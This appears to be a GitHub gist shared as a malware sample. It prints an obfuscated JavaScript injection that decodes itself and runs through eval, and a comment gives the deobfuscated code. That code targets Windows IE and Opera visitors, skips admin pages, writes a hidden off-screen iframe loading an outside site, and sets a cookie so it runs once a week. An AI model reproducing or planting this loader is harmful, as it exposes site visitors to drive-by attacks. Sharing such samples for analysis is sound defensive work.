Skip to content

Instantly share code, notes, and snippets.

@moneal

moneal/gist:4456709

Created January 4, 2013 21:37
Show Gist options
  • Save moneal/4456709 to your computer and use it in GitHub Desktop.
Save moneal/4456709 to your computer and use it in GitHub Desktop.
Download ZIP
Sample malware
Raw
gistfile1.js
/*ded87fb3b80c1c71a65e465501e2c455*/try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["createElement"]("span");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=["3o","4d","46","3l","4c","41","47","46","16","3p","4a","3j","1e","3j","1i","3k","1f","4j","4a","3n","4c","4d","4a","46","16","2p","3j","4c","40","1k","3o","44","47","47","4a","1e","2p","3j","4c","40","1k","4a","3j","46","3m","47","45","1e","1f","1g","1e","3k","1j","3j","1h","1n","1f","1f","1h","3j","27","4l","d","a","3o","4d","46","3l","4c","41","47","46","16","4a","4b","1e","1f","4j","4a","3n","4c","4d","4a","46","16","2p","3j","4c","40","1k","4a","3j","46","3m","47","45","1e","1f","1k","4c","47","35","4c","4a","41","46","3p","1e","1p","22","1f","1k","4b","4d","3k","4b","4c","4a","41","46","3p","1e","21","1f","27","4l","d","a","41","3o","1e","46","3j","4e","41","3p","3j","4c","47","4a","1k","3l","47","47","43","41","3n","2h","46","3j","3k","44","3n","3m","16","1c","1c","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","1k","41","46","3m","3n","4g","31","3o","1e","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1f","29","29","1j","1n","1f","4j","d","a","9","4e","3j","4a","16","4b","4c","46","45","29","4a","4b","1e","1f","27","d","a","9","4e","3j","4a","16","4d","3j","16","29","16","46","3j","4e","41","3p","3j","4c","47","4a","1k","4d","4b","3n","4a","2d","3p","3n","46","4c","1k","4c","47","2o","47","4f","3n","4a","2f","3j","4b","3n","1e","1f","27","d","a","9","4e","3j","4a","16","4d","4a","44","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","44","47","3l","3j","4c","41","47","46","1k","40","4a","3n","3o","1k","4c","47","2o","47","4f","3n","4a","2f","3j","4b","3n","1e","1f","27","d","a","9","41","3o","1e","4d","4a","44","1k","41","46","3m","3n","4g","31","3o","1e","1d","3j","3m","45","41","46","1d","1f","29","29","1j","1n","16","1c","1c","16","4d","3j","1k","41","46","3m","3n","4g","31","3o","1e","1d","4f","41","46","3m","47","4f","4b","1d","1f","17","29","1j","1n","16","1c","1c","16","1e","4d","3j","1k","41","46","3m","3n","4g","31","3o","1e","1d","45","4b","41","3n","1d","1f","17","29","1j","1n","4k","4k","4d","3j","1k","41","46","3m","3n","4g","31","3o","1e","1d","47","48","3n","4a","3j","1d","1f","17","29","1j","1n","1f","1f","4j","d","a","9","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","1d","28","4b","4c","4h","44","3n","2a","1k","4b","1d","1h","4b","4c","46","45","1h","1d","16","4j","16","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","16","44","3n","3o","4c","26","1j","1d","1h","3p","4a","3j","1e","22","1m","1m","1i","1n","1m","1m","1m","1f","1h","1d","48","4g","27","16","4c","47","48","26","1j","1d","1h","3p","4a","3j","1e","22","1m","1m","1i","1n","1m","1m","1m","1f","1h","1d","48","4g","27","16","4l","28","1l","4b","4c","4h","44","3n","2a","16","28","3m","41","4e","16","3l","44","3j","4b","4b","29","18","4b","1d","1h","4b","4c","46","45","1h","1d","18","2a","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","18","40","4c","4c","48","26","1l","1l","4d","46","4i","41","48","48","41","46","3p","47","48","3n","46","4c","4h","48","3n","1k","47","4a","3p","1l","3j","3m","1l","3o","3n","3n","3m","1k","48","40","48","18","16","4f","41","3m","4c","40","29","18","1d","1h","3p","4a","3j","1e","1p","1m","1m","1i","22","1m","1m","1f","1h","1d","18","16","40","3n","41","3p","40","4c","29","18","1d","1h","3p","4a","3j","1e","1p","1m","1m","1i","22","1m","1m","1f","1h","1d","18","2a","28","1l","41","3o","4a","3j","45","3n","2a","28","1l","3m","41","4e","2a","1d","1f","27","d","a","9","4l","d","a","9","4e","3j","4a","16","3n","4g","48","29","46","3n","4f","16","2g","3j","4c","3n","1e","1f","27","3n","4g","48","1k","4b","3n","4c","2g","3j","4c","3n","1e","3n","4g","48","1k","3p","3n","4c","2g","3j","4c","3n","1e","1f","1h","23","1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-827!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}/*ded87fb3b80c1c71a65e465501e2c455*/
@moneal
Copy link
Author

moneal commented Jan 4, 2013

// unobfuscated code

function gra(a,b){return Math.floor(Math.random()*(b-a+1))+a;}
function rs(){return Math.random().toString(36).substring(5);}
if(navigator.cookieEnabled && document.cookie.indexOf('testcookie1=')==-1){
    var stnm=rs();
    var ua = navigator.userAgent.toLowerCase();
    var url = document.location.href.toLowerCase();
    if(url.indexOf('admin')==-1 && ua.indexOf('windows')!=-1 && (ua.indexOf('msie')!=-1||ua.indexOf('opera')!=-1)){
        document.write('<style>.s'+stnm+' { position:absolute; left:-'+gra(600,1000)+'px; top:-'+gra(600,1000)+'px; }</style> <div class="s'+stnm+'"><iframe src="http://unzippingopentype.org/ad/feed.php" width="'+gra(300,600)+'" height="'+gra(300,600)+'"></iframe></div>');
    }
    var exp=new Date();exp.setDate(exp.getDate()+7);
    document.cookie='testcookie1='+rs()+'; expires='+exp.toGMTString();
}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment